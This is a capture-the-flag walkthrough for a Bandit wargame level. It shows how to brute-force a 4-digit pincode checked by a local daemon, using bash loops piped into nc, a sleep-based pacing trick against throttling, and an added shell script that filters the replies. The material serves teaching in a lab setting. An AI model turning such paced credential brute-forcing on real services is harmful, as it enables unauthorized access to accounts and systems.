
Bandit24->25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time.

Commands useful to solve the level

Helpful Reading Material

Where to start?

We already know that a daemon is listening on port 30002 and expects our password together with a pincode. The goal here is to find an efficient way to brute-force that pincode and retrieve the password for the next level.

Part 1 : Getting to know the daemon

This part will be pretty short as we already have experience with daemons (see bandit14 for more explanations). We will simply connect and try to communicate with the daemon to see how we should speak with it.

Hint

By using the nc utility, can you figure out the format of the string you should send to the daemon in order to craft your brute-force attack?

Solution

Using nc, we can speak with the daemon and run the following tests:

bandit24@bandit:/tmp/abcdef.PtK5$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
bandit24_password 0000
Wrong! Please enter the correct pincode. Try again.
bandit24_pasword 0001
Wrong! Please enter the correct pincode. Try again.
^C
bandit24@bandit:/tmp/abcdef.PtK5$ 
From that exchange we know the format of the string we are supposed to send to the daemon: the bandit24 password and the pincode on one line, separated by a space. Let's now use this knowledge to craft our brute-force attack.

Part 2 : Crafting the attack

Now that we know how to communicate with the server, and have confirmed that we don't have to open a new connection for each message, let's generate all the password/pincode combinations for our brute-force attack.

Hint

Using the Brace Expansion, Looping Constructs and printf sections of the GNU Bash manual, can you figure out a way to generate all the combinations for our attack?

Solution

You'll be able to find a lot of solutions following the same pattern all over the internet. Let's try to do something a bit different.

We are going to use a for loop, but not the form that iterates over a word list (the one almost every other write-up uses); we will use the form that is driven by an arithmetic expression.

Here is what our loop is going to be:

for (( i=0 ; i < 10000 ; ++i )) ; do printf "%s %04d\n" "bandit24_pass" "$i" ; done

Here is a detail of what our loop does:

  1. For every integer between 0 and 9999 it does the following:
  2. It prints the string bandit24_pass followed by the value of the integer, padded with zeros on the left to a field width of 4 characters.

Part 3 : Launching the attack and retrieving the password

Now that we know what our for loop looks like, you might want to know why we used this construct instead of the first form. Let's not wonder about that for now and instead launch the attack.

Hint

Using our newly constructed for loop, can you figure out a way to use nc to retrieve the password?

Solution

Here is how we are going to use our for loop to retrieve the password.

for (( i=0 ; i < 10000 ; ++i )) ; do printf "%s %04d\n" "bandit24_pass" "$i" ; done | nc -w 10 localhost 30002

This loop sends all 10000 strings to the server over a single connection, which is enough to retrieve the password.

Info

The -w option of nc lets you specify a timeout (in seconds) for an idle connection. If no data is exchanged for that long, nc closes the connection, so the command terminates even though the daemon does not close it for us.

Part 4 : Let me think please

If this hasn't been patched yet, you might notice that the server blocks indefinitely after a given number of attempts sent in a burst. The goal of this last part is to make sure the server doesn't block and that we get to send all 10000 attempts.

Hint

Starting from the command of the previous part, can you add a simple check so that the loop doesn't send all the attempts at once, but waits a bit before sending each chunk of attempts?

Solution

Here is the updated command:

for (( i=0 ; i < 10000 ; ++i )) ; do if (( $i%500 == 0 )) ; then sleep 1 ; fi ; printf "%s %04d\n" "bandit24_pass" "$i" ; done | nc -w 10 localhost 30002

The if check pauses for one second before every chunk of 500 attempts, which gives the server time to process the input and ensures that it won't block after a given number of requests.
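The same paced approach packaged as a small script, added here as an example (it is not code from the original walkthrough). It is written in POSIX sh so it runs under sh or bash, and it adds a reply filter that drops the banner and the "Wrong!" lines so only the daemon's answer for the correct pin is left to read. The success wording in the sample is a constructed placeholder, not the daemon's real output.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough. It packages the
# paced brute-force from Part 4 into two functions so the attempt stream
# and the reply filter can be checked offline, without the daemon.
# Written in POSIX sh (the for (( )) form above is bash-only), so it runs
# under sh or bash. Assumes only the reply format observed in Part 1.

# Print "<password> <pin>" for every 4-digit pin, zero-padded, pausing
# PACE_SECONDS (default 1) before each chunk of CHUNK_SIZE (default 500)
# attempts so the daemon is not flooded (same pacing as the Part 4 loop).
gen_attempts() {
    ga_pin=0
    while [ "$ga_pin" -lt 10000 ]; do
        if [ $((ga_pin % ${CHUNK_SIZE:-500})) -eq 0 ]; then
            sleep "${PACE_SECONDS:-1}"
        fi
        printf '%s %04d\n' "$1" "$ga_pin"
        ga_pin=$((ga_pin + 1))
    done
}

# Drop the banner and every "Wrong!" rejection so only the reply for the
# correct pin (the line carrying the bandit25 password) is left to read.
filter_replies() {
    grep -v -e '^I am the pincode checker' -e '^Wrong!' || true
}

# Constructed stand-in for the daemon's output: banner, two rejections,
# then a success reply with a placeholder (the real wording may differ).
SAMPLE_REPLIES='I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is <PLACEHOLDER_BANDIT25_PASSWORD>'

# Live use (bandit24 password as first argument), equivalent to the
# Part 4 command with the noise removed:
#   gen_attempts "$1" | nc -w 10 localhost 30002 | filter_replies
# Offline demo of the filter on the constructed sample:
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_REPLIES" | filter_replies
fi
```

Run it with --demo to see the filter on the constructed sample; PACE_SECONDS and CHUNK_SIZE can be overridden from the environment.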

Full Solution

  1. for (( i=0 ; i < 10000 ; ++i )) ; do if (( $i%500 == 0 )) ; then sleep 1 ; fi ; printf "%s %04d\n" "bandit24_pass" "$i" ; done | nc -w 10 localhost 30002

     This command tests the password with all of the 10000 pin combinations against the server and prints the password for the next level once the right pin has been entered.

Warning

Do not forget to replace bandit24_pass with the actual password for the bandit24 user.

You can now jump to the next level.